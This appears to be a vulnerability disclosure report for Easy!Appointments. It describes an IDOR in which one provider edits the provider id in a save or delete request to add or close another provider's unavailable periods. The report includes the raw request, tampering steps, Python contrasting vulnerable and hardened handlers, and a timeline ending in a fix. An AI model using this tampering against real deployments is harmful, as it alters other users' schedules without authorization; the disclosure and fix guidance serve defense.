IDOR lets attackers add or close other providers' unavailable periods in alextselegidis/easyappointments

Valid

Reported on

Jun 5th 2023


Both user1 and user2 are Providers (user1 has provider id 9, user2 has provider id 10).

1. user1 logs in and adds an unavailable period from the backend calendar.

2. The request sent by the browser looks like this:

POST /index.php/backend_api/ajax_save_unavailable HTTP/1.1
.....
csrfToken=d0a4805b08a205bfd5cf112137b21585&unavailable=%7B%22start_datetime%22%3A%222023-06-07+01%3A45%22%2C%22end_datetime%22%3A%222023-06-07+02%3A45%22%2C%22notes%22%3A%22%22%2C%22id_users_provider%22%3A%229%22%7D

3. The URL-encoded fragment id_users_provider%22%3A%229%22%7D decodes to "id_users_provider":"9", so the provider that owns the unavailable period is taken from the request body rather than from the logged-in session.

4. Change the id to 10, i.e. user2's provider id, and leave everything else (including user1's csrfToken) unchanged.

5. Send the request. The unavailable period is now stored under user2's calendar, even though the request was made by user1. The same flow works for the endpoint that deletes an unavailable period, so user1 can also close user2's unavailable periods.
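The steps above boil down to one missing check: the server binds the record to the id_users_provider value the client sends instead of to the authenticated user. The following Python is an added illustration written for this page, not code from Easy!Appointments or from the fix commit. It decodes the report's request body, tampers with the provider id as in step 4, and then contrasts a handler that trusts the client-supplied id with one that enforces ownership. The names (decode_unavailable, tamper, UnavailableStore, vulnerable_save, hardened_save), the in-memory store and the session dicts are all assumptions for the demo; the role model (providers may only write their own calendar, admins may write any) is an illustration, not a statement of how the project's fix works.

```python
import json
from urllib.parse import parse_qs

# Constructed request body copied from step 2 of the report (assumption: this is
# the complete POST body apart from headers).
REPORT_BODY = (
    "csrfToken=d0a4805b08a205bfd5cf112137b21585&unavailable=%7B%22start_datetime%22%3A"
    "%222023-06-07+01%3A45%22%2C%22end_datetime%22%3A%222023-06-07+02%3A45%22%2C"
    "%22notes%22%3A%22%22%2C%22id_users_provider%22%3A%229%22%7D"
)


def decode_unavailable(body: str) -> dict:
    """Step 3: decode the form body and parse the 'unavailable' JSON object."""
    fields = parse_qs(body, keep_blank_values=True)
    return json.loads(fields["unavailable"][0])


def tamper(body: str, new_provider_id: str) -> dict:
    """Step 4: return the decoded object with id_users_provider swapped."""
    unavailable = decode_unavailable(body)
    unavailable["id_users_provider"] = new_provider_id
    return unavailable


class UnavailableStore:
    """Hypothetical in-memory stand-in for the unavailabilities table."""

    def __init__(self) -> None:
        self.rows: dict[str, list[dict]] = {}  # provider id -> saved periods

    def save(self, unavailable: dict) -> None:
        owner = str(unavailable["id_users_provider"])
        self.rows.setdefault(owner, []).append(unavailable)


class AccessDenied(Exception):
    pass


def vulnerable_save(store: UnavailableStore, session: dict, unavailable: dict) -> str:
    """IDOR: the owner is whatever the client put in id_users_provider.
    The session is never consulted, so any logged-in provider can write
    into any other provider's calendar (step 5 of the report)."""
    store.save(unavailable)
    return str(unavailable["id_users_provider"])


def hardened_save(store: UnavailableStore, session: dict, unavailable: dict) -> str:
    """Ownership check: a provider may only manage its own unavailable
    periods. Rejecting the mismatch (rather than silently overwriting the
    id) also makes tampering attempts visible in logs."""
    owner = str(unavailable["id_users_provider"])
    if session["role"] == "provider" and owner != str(session["user_id"]):
        raise AccessDenied(
            f"provider {session['user_id']} may not modify unavailabilities of provider {owner}"
        )
    # Assumption for the demo: admins may manage every provider's calendar.
    store.save(unavailable)
    return owner


if __name__ == "__main__":
    user1 = {"user_id": 9, "role": "provider"}
    forged = tamper(REPORT_BODY, "10")  # user1 targets user2 (provider 10)

    weak = UnavailableStore()
    print("vulnerable handler stored under provider", vulnerable_save(weak, user1, forged))

    strict = UnavailableStore()
    try:
        hardened_save(strict, user1, forged)
    except AccessDenied as exc:
        print("hardened handler rejected:", exc)
```

The same ownership rule has to be applied on the delete endpoint, since the report notes that closing another provider's unavailable period works the same way; a check only on save leaves half of the IDOR in place.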

Impact

Any authenticated provider can add or close other providers' unavailable periods, blocking or freeing booking slots in calendars they do not own.

We are processing your report and will contact the alextselegidis/easyappointments team within 24 hours. 4 months ago
lujiefsi modified the report
4 months ago
We have contacted a member of the alextselegidis/easyappointments team and are waiting to hear back 3 months ago
lujiefsi modified the report
3 months ago
lujiefsi
3 months ago

Researcher


any update for this issue?

lujiefsi
2 months ago

Researcher


any update?

Alex Tselegidis validated this vulnerability 2 months ago
lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alex Tselegidis marked this as fixed in 1.5.0 with commit b37b46 2 months ago
Alex Tselegidis has been awarded the fix bounty
This vulnerability has been assigned a CVE
Alex Tselegidis published this vulnerability 2 months ago